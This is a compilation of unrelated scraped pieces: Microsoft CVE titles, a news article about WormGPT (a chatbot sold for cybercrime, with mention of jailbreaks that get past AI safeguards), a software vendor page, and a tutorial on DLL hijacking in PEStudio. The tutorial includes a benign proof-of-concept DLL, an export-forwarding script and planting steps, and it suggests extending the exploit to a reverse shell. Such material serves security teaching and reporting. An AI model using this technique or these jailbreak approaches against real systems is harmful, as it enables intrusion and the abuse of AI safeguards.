Microsoft Teams Remote Code Execution Vulnerability

CVE-2023-29328

CVE-2023-29330

Microsoft Exchange Server Elevation of Privilege Vulnerability

CVE-2023-21709

Microsoft Exchange Server Remote Code Execution Vulnerability

CVE-2023-35388

Microsoft Exchange Remote Code Execution Vulnerability

CVE-2023-35368

CVE-2023-38182

CVE-2023-38185

WormGPT, a private new chatbot service advertised as a way to use Artificial Intelligence (AI) to help write malicious software without all the pesky prohibitions on such activity enforced by ChatGPT and Google Bard, has started adding restrictions on how the service can be used. Faced with customers trying to use WormGPT to create ransomware and phishing scams, the 23-year-old Portuguese programmer who created the project now says his service is slowly morphing into “a more controlled environment.”

The large language models (LLMs) made by ChatGPT parent OpenAI or Google or Microsoft all have various safety measures designed to prevent people from abusing them for nefarious purposes — such as creating malware or hate speech. In contrast, WormGPT has promoted itself as a new LLM that was created specifically for cybercrime activities.

**WormGPT**, a private new chatbot service advertised as a way to use Artificial Intelligence (AI) to write malicious software without all the pesky prohibitions on such activity enforced by the likes of **ChatGPT** and **Google Bard**, has started adding restrictions of its own on how the service can be used. Faced with customers trying to use WormGPT to create ransomware and phishing scams, the 23-year-old Portuguese programmer who created the project now says his service is slowly morphing into “a more controlled environment.”

Image: SlashNext.com.

The large language models (LLMs) made by ChatGPT parent **OpenAI** or **Google** or **Microsoft** all have various safety measures designed to prevent people from abusing them for nefarious purposes — such as creating malware or hate speech. In contrast, WormGPT has promoted itself as a new, uncensored LLM that was created specifically for cybercrime activities.

WormGPT was initially sold exclusively on **HackForums**, a sprawling, English-language community that has long featured a bustling marketplace for cybercrime tools and services. WormGPT licenses are sold for prices ranging from 500 to 5,000 Euro.

“Introducing my newest creation, ‘WormGPT,’ wrote “**Last**,” the handle chosen by the HackForums user who is selling the service. “This project aims to provide an alternative to ChatGPT, one that lets you do all sorts of illegal stuff and easily sell it online in the future. Everything blackhat related that you can think of can be done with WormGPT, allowing anyone access to malicious activity without ever leaving the comfort of their home.”

WormGPT’s core developer and frontman “Last” promoting the service on HackForums. Image: SlashNext.

In July, an AI-based security firm called **SlashNext** analyzed WormGPT and asked it to create a “business email compromise” (BEC) phishing lure that could be used to trick employees into paying a fake invoice.

“The results were unsettling,” SlashNext’s **Daniel Kelley** wrote. “WormGPT produced an email that was not only remarkably persuasive but also strategically cunning, showcasing its potential for sophisticated phishing and BEC attacks.”

SlashNext asked WormGPT to compose this BEC phishing email. Image: SlashNext.

A review of Last’s posts on HackForums over the years shows this individual has extensive experience creating and using malicious software. In August 2022, Last posted a sales thread for “**Arctic Stealer**,” a data stealing trojan and keystroke logger that he sold there for many months.

“I’m very experienced with malwares,” Last wrote in a message to another HackForums user last year.

Last has also sold a modified version of the information stealer **DCRat**, as well as an obfuscation service marketed to malicious coders who sell their creations and wish to insulate them from being modified or copied by customers.

Shortly after joining the forum in early 2021, Last told several different Hackforums users his name was Rafael and that he was from Portugal. HackForums has a feature that allows anyone willing to take the time to dig through a user’s postings to learn when and if that user was previously tied to another account.

That account tracing feature reveals that while Last has used many pseudonyms over the years, he originally used the nickname “**ruiunashackers**.” The first search result in Google for that unique nickname brings up a **TikTok** account with the same moniker, and that TikTok account says it is associated with an **Instagram** account for a **Rafael Morais** from Porto, a coastal city in northwest Portugal.

**AN OPEN BOOK**

Reached via Instagram and Telegram, Morais said he was happy to chat about WormGPT.

“You can ask me anything,” Morais said. “I’m an open book.”

Morais said he recently graduated from a polytechnic institute in Portugal, where he earned a degree in information technology. He said only about 30 to 35 percent of the work on WormGPT was his, and that other coders are contributing to the project. So far, he says, roughly 200 customers have paid to use the service.

“I don’t do this for money,” Morais explained. “It was basically a project I thought \[was\] interesting at the beginning and now I’m maintaining it just to help \[the\] community. We have updated a lot since the release, our model is now 5 or 6 times better in terms of learning and answer accuracy.”

WormGPT isn’t the only rogue ChatGPT clone advertised as friendly to malware writers and cybercriminals. According to SlashNext, one unsettling trend on the cybercrime forums is evident in discussion threads offering “jailbreaks” for interfaces like ChatGPT.

“These ‘jailbreaks’ are specialised prompts that are becoming increasingly common,” Kelley wrote. “They refer to carefully crafted inputs designed to manipulate interfaces like ChatGPT into generating output that might involve disclosing sensitive information, producing inappropriate content, or even executing harmful code. The proliferation of such practices underscores the rising challenges in maintaining AI security in the face of determined cybercriminals.”

Morais said they have been using the GPT-J 6B model since the service was launched, although he declined to discuss the source of the LLMs that power WormGPT. But he said the data set that informs WormGPT is enormous.

“Anyone that tests wormgpt can see that it has no difference from any other uncensored AI or even chatgpt with jailbreaks,” Morais explained. “The game changer is that our dataset \[library\] is big.”

Morais said he began working on computers at age 13, and soon started exploring security vulnerabilities and the possibility of making a living by finding and reporting them to software vendors.

“My story began in 2013 with some greyhat activies, never anything blackhat tho, mostly bugbounty,” he said. “In 2015, my love for coding started, learning c# and more .net programming languages. In 2017 I’ve started using many hacking forums because I have had some problems home (in terms of money) so I had to help my parents with money… started selling a few products (not blackhat yet) and in 2019 I started turning blackhat. Until a few months ago I was still selling blackhat products but now with wormgpt I see a bright future and have decided to start my transition into whitehat again.”

WormGPT sells licenses via a dedicated channel on Telegram, and the channel recently lamented that media coverage of WormGPT so far has painted the service in an unfairly negative light.

“We are uncensored, not blackhat!” the WormGPT channel announced at the end of July. “From the beginning, the media has portrayed us as a malicious LLM (Language Model), when all we did was use the name ‘blackhatgpt’ for our Telegram channel as a meme. We encourage researchers to test our tool and provide feedback to determine if it is as bad as the media is portraying it to the world.”

It turns out, when you advertise an online service for doing bad things, people tend to show up with the intention of doing bad things with it. WormGPT’s front man Last seems to have acknowledged this at the service’s initial launch, which included the disclaimer, “We are not responsible if you use this tool for doing bad stuff.”

But lately, Morais said, WormGPT has been forced to add certain guardrails of its own.

“We have prohibited some subjects on WormGPT itself,” Morais said. “Anything related to murders, drug traffic, kidnapping, child porn, ransomwares, financial crime. We are working on blocking BEC too, at the moment it is still possible but most of the times it will be incomplete because we already added some limitations. Our plan is to have WormGPT marked as an uncensored AI, not blackhat. In the last weeks we have been blocking some subjects from being discussed on WormGPT.”

Still, Last has continued to state on HackForums — and more recently on the far more serious cybercrime forum **Exploit** — that WormGPT will quite happily create malware capable of infecting a computer and going “fully undetectable” (FUD) by virtually all of the major antivirus makers (AVs).

“You can easily buy WormGPT and ask it for a Rust malware script and it will 99% sure be FUD against most AVs,” Last told a forum denizen in late July.

Asked to list some of the legitimate or what he called “white hat” uses for WormGPT, Morais said his service offers reliable code, unlimited characters, and accurate, quick answers.

“We used WormGPT to fix some issues on our website related to possible sql problems and exploits,” he explained. “You can use WormGPT to create firewalls, manage iptables, analyze network, code blockers, math, anything.”

Morais said he wants WormGPT to become a positive influence on the security community, not a destructive one, and that he’s actively trying to steer the project in that direction. The original HackForums thread pimping WormGPT as a malware writer’s best friend has since been deleted, and the service is now advertised as “WormGPT – Best GPT Alternative Without Limits — Privacy Focused.”

“We have a few researchers using our wormgpt for whitehat stuff, that’s our main focus now, turning wormgpt into a good thing to \[the\] community,” he said.

It’s unclear yet whether Last’s customers share that view.

Meet the Brains Behind the Malware-Friendly AI Chat Service ‘WormGPT’

An issue in the CAB file extraction function of Bitberry File Opener v23.0 allows attackers to execute a directory traversal.

*   Contact

Quality software for Windows since 2000

**Bitberry File Opener**

Our popular file viewer, which was first released in 2010, is used by hundreds of thousands of happy users to view and play a large variety of file types, including documents, spreadsheets, images, videos and audio files.

The second generation, released in 2021 and renamed Bitberry File Opener, is a major update that supports the **opening of 410 file types**. It adds support for advanced image editing, archive- and compressed file extraction, as well as opening and editing of Microsoft Word documents and Microsoft Excel spreadsheets without having Microsoft Office installed.

More information

**Photo Handler**

Photo Handler is our photo management software. Import photos from your camera, convert and resize, add effects and watermarks, batch process photos and much more.

More information

**BitZipper**

BitZipper, our first product initially released way back in year 2000, enables you to open 47 different compressed and encoded file formats with superior ease of use. It contains a powerful built-in file previewer, so you can preview files before decompressing them.

More information

**Final Media Player**

Final Media Player is a media player that supports more than 80 types of audio and video files. Everything needed is included in the setup program. No obscure codecs needed. Just install and play your files.

More information

**Get in touch!**

Contact us to get a quote for a multi-user business license, to get product support, to discuss business opportunities - or to just say hi :-)

CVE-2023-37646: Bitberry Software produces a growing range of products for Windows PCs, and has been doing so since 2000

An issue in PEStudio v.9.52 allows a remote attacker to execute arbitrary code via a crafted DLL file to the PESstudio exeutable.

Lately, I have reported multiple DLL Hijacking vulnerabilities. These are quite straightforward, yet quite impactful. Thus, I thought of sharing some theory as well as a practical example of DLL Hijacking (how exciting, right?). This is YADHA (Yet Another DLL Hijacking Article)!

1.  DLL Hijacking Theory
    1.  Let’s Look at the Win32 API LoadLibraryA Function
2.  How to Find DLL Hijacking Vulnerabilities?
3.  Creating the Exploit
4.  Impact

**DLL Hijacking Theory**

In the simplest terms, DLL Hijacking, also known as DLL side-loading, is an attack that exploits the way Windows searches for and loads DLL files, allowing an attacker to replace a legitimate DLL with a malicious one, leading to unauthorized code execution. This can happen due to various reasons, such as:

*   Incorrect DLL search order: Windows searches for DLLs in specific locations, such as the current directory or system folders. If an application does not specify the DLL’s full path, an attacker can place a malicious DLL in a directory with higher search priority, leading to the hijacking.

*   Weak or missing DLL loading safeguards: Applications may not implement sufficient security measures to validate the integrity and authenticity of DLL files, making them susceptible to substitution by malicious counterparts.

**Let’s Look at the Win32 API LoadLibraryA Function**

LoadLibraryA loads the specified module into the address space of the calling process. The specified module may cause other modules to be loaded (see https://learn.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya).

The screenshot above, highlights the essence of the issue by noting that if the string specifies a full path, the function searches only that path for the module, however, if the string specifies a relative path or a module name without a path, the function uses a standard search strategy to find the module. This is interesting, because it highlights a neat fix to the DLL Hijacking issue – specifying full paths to the modules.

This article (https://learn.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-security) gives us some more insight into the load order. Assuming safe DLL search mode is enabled and the application is not using an alternate search order, the system searches directories in the following order:

1.  The directory from which the application loaded.
2.  The system directory.
3.  The 16-bit system directory.
4.  The Windows directory.
5.  The current directory.
6.  The directories that are listed in the PATH environment variable.

In other words, if the DLL is located in the directory form which the application is loaded, the application will stop searching the other directories for the module. Thus, if we can write to the search directories, we can manipulate the DLLs which are loaded.

**How to Find DLL Hijacking Vulnerabilities?**

Feel free to follow along with this section!

Let’s take the example of PEStudio 9.52. We can download PEStudio 9.52 from the following link: https://www.winitor.com/download2. In order to find DLL Hijacking vulnerabilities, we will need Procmon – a fantastic utility which is part of Microsoft’s SysInternals Suite (https://download.sysinternals.com/files/SysinternalsSuite.zip).

With our vulnerable application (PEStudio 9.52) and our tools (SysInternals Suite) downloaded, we are ready to start! The first step is to run Procmon64.exe and set the following filters:

We are looking for DLLs which are attempted to be loaded by pestudio.exe and are not found. Now that we started capturing using the filters above, we can start PEStudio. It isn’t long before we get the following results in Procmon:

This indicates that the 6 DLLs are attempted to be loaded from the directory from which the application is loaded. Let’s take sensapi.dll as an example for further inspection – by changing the _Path ends with_ filter from “.dll” to “sensapi.dll”. We now find that pestudio.exe tries to load sensapi.dll from the directory from which the application is loaded, fails, and then loads it from System32.

Thus, if we are able to write our own malicious version of sensapi.dll into the pestudio folder, we may be able to run arbitrary commands on the system.

**Creating the Exploit**

Let’s take the following Proof of Concept C code (dll\_hijack.c):

    #include <windows.h>
    #pragma comment (lib, "user32.lib")
    
    BOOL APIENTRY DllMain(HMODULE hModule,  DWORD  ul_reason_for_call, LPVOID lpReserved) {
        switch (ul_reason_for_call)  {
        case DLL_PROCESS_ATTACH:
          MessageBox(
            NULL,
            "DLL Hijack!",
            "PoC",
            MB_OK
          );
          break;
        case DLL_PROCESS_DETACH:
          break;
        case DLL_THREAD_ATTACH:
          break;
        case DLL_THREAD_DETACH:
          break;
        }
        return TRUE;
    }

This piece of code should generate a message box. Of course, this is a benign PoC, however, the potential for malicious code is only limited by the attacker’s imagination.

Let’s also create the following Python script (dll\_def.py):

    import pefile
    import sys
    import os.path
    
    dll = pefile.PE(sys.argv[1])
    dll_basename = os.path.splitext(sys.argv[1])[0]
    
    try:
        with open(sys.argv[1].split("/")[-1].replace(".dll", ".def"), "w") as f:
            f.write("EXPORTS\n")
            for export in dll.DIRECTORY_ENTRY_EXPORT.symbols:
                if export.name:
                    f.write('{}={}.{} @{}\n'.format(export.name.decode(), dll_basename, export.name.decode(), export.ordinal))
    except:
        print ("Failed to create .def file :(")
    else:
        print ("Successfully created .def file :)")

The Python script was inspired by https://cocomelonc.github.io/pentest/2021/10/12/dll-hijacking-2.html. The script enumerates the exported functions from a DLL. The reason for this will soon become clear.

We must first find the original DLL and transfer it to our attack box.

Then, we must find the functions exported by the initial DLL and create a .def file using the Python scrip shared above. We must use this .def file when compiling our C PoC, because otherwise there is a chance that our DLL will not be loaded due to missing procedures or entry points. After cross compiling the DLL (we are creating a Windows-specific file on a Linux system), we must transfer the resulting DLL onto the Windows system.

We then place poc.dll into the same folder as pestudio.exe and rename it to sensapi.dll. Now, when we run pestudio.exe, we see that our DLL was loaded and generated a message box. Once we click OK, pestudio runs normally.

**Impact**

Generally speaking, DLL Hijacking can allow attackers to run arbitrary commands on the victim’s system. In some cases, DLL Hijacking is used for privilege escalation, however, this is not the case for PEStudio, because I don’t see any reason to run PEStudio as admin. Nevertheless, application developers should take security into account and provide full paths to loaded modules in order to avoid these types of attacks. I encourage you to try to exploit this vulnerability in PEStudio to cause a reverse shell or create a user, but also to try to find these types of vulnerabilities in other applications, as I get the sense that there are a lot more of them than reported.

Tag

#microsoft